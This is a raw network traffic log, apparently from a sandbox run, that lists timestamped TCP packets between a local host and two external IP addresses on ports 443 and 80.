Sep 27, 2024 00:28:54.024949074 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.024974108 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.025047064 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.025054932 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.025101900 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.036640882 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.036664009 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.036765099 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.036777020 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.036855936 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.053011894 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.053034067 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.053147078 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.053158045 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.053204060 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.062447071 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.062465906 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.062551022 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.062558889 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.062601089 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.064032078 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.064049959 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.064162970 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.064169884 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.064213991 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.089668989 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.089698076 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.089847088 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.089857101 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.089905977 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.119544983 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.119579077 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.119751930 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.119765043 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.119827032 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.119838953 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.119858027 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.119923115 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.119929075 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.119971991 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.120873928 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.120910883 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.120965004 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.120971918 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.121011972 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.121036053 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.129101038 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.129128933 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.129228115 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.129236937 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.129282951 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.145396948 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.145432949 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.145667076 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.145677090 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.145739079 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.155054092 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.155081987 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.155169010 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.155179977 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.155225039 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.156389952 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.156408072 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.156483889 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.156491041 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.156538963 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.182252884 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.182286024 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.182409048 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.182424068 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.182477951 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.211754084 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.211782932 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.211879015 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.211899996 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.211949110 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.212575912 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.212606907 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.212656975 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.212665081 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.212712049 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.212732077 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.213331938 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.213347912 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.213445902 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.213454008 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.213500023 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.221699953 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.221724033 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.221776962 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.221786022 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.221837044 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.238369942 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.238399029 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.238554955 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.238581896 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.238627911 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.247834921 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.247881889 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.247925997 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.247935057 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.247962952 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.247987986 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.248178005 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.248194933 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.519115925 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.519156933 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.519258976 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.519608021 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.519619942 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:55.175448895 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:55.175698996 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:55.176376104 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:55.176388025 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:55.178627968 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:55.178639889 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:55.178662062 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:55.178670883 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:55.948539972 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:55.948594093 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:55.948672056 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:55.950712919 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:55.950726032 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:56.039406061 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:56.039470911 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:56.039500952 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:56.039518118 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:56.039554119 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:56.039577007 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:56.041564941 CEST	57894	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:56.041583061 CEST	443	57894	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:56.630132914 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:56.630208969 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:56.630812883 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:56.630826950 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:56.632957935 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:56.632972002 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:57.334279060 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:57.334358931 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:57.334398031 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.334434032 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:57.334450960 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.334486961 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.334522963 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:57.334578991 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.334778070 CEST	57895	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.334794044 CEST	443	57895	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:57.337991953 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.338040113 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:57.338146925 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.338392019 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:57.338402987 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.006752968 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.006839991 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.007486105 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.007498980 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.009792089 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.009799957 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.736721039 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.736757994 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.736866951 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.736871958 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.736929893 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.737307072 CEST	57896	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.737328053 CEST	443	57896	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.790178061 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.790226936 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:58.790330887 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.790585995 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:58.790601969 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:59.441382885 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:59.441471100 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:59.442027092 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:59.442034006 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:59.446010113 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:59.446018934 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:00.207658052 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:00.207742929 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:00.207968950 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:00.207968950 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:00.208785057 CEST	57897	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:00.208798885 CEST	443	57897	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:00.843225956 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:00.843275070 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:00.843430042 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:00.843786001 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:00.843802929 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.494483948 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.494683981 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.495594025 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.495605946 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499373913 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499380112 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499552965 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499569893 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499650002 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499660969 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499671936 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499681950 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499690056 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499706984 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499730110 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499737024 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499764919 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499789953 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499821901 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499830008 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499876022 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499882936 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:01.499934912 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:01.499946117 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:02.805366039 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:02.805453062 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:02.805460930 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:02.805514097 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:02.805775881 CEST	57899	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:02.805798054 CEST	443	57899	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:02.810142994 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:02.810189009 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:02.810280085 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:02.810678005 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:02.810692072 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:03.466814041 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:03.467077017 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:03.467482090 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:03.467489004 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:03.469578981 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:03.469584942 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:04.292202950 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:04.292298079 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:04.292424917 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:04.292521954 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:04.293040037 CEST	57900	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:04.293060064 CEST	443	57900	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:04.296765089 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:04.303376913 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.303519011 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:04.303801060 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:04.309938908 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946495056 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946511030 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946522951 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946559906 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946573019 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946583986 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946598053 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946610928 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946624994 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946636915 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.946721077 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:04.946721077 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:04.951699018 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.951714993 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.951730013 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:04.951823950 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:04.951823950 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.037420988 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.037436008 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.037446976 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.037457943 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.037605047 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.037605047 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.037811995 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.037826061 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.037837982 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.037851095 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.038147926 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.038147926 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.038664103 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.038677931 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.038688898 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.038702011 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.038716078 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.038758993 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.038758993 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.038759947 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.039328098 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.039340019 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.039350986 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.039381027 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.039397955 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.039457083 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.039493084 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.039493084 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.039493084 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.040262938 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.040286064 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.040297031 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.040311098 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.040323019 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.040344000 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.040344000 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.040465117 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.128870964 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.128885031 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.128900051 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.128963947 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.128963947 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.128976107 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.128988981 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.128999949 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129012108 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129018068 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.129050016 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.129395008 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.129427910 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129441977 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129453897 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129463911 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129476070 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129492044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129503012 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.129518032 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.129518032 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.129575014 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.130089045 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.130116940 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.130127907 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.130211115 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.130222082 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.130234957 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.130247116 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.130255938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.130255938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.130255938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.130518913 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.130518913 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.131091118 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131103992 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131117105 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131128073 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131139040 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.131149054 CEST	57901	80	192.168.2.6	147.45.44.104
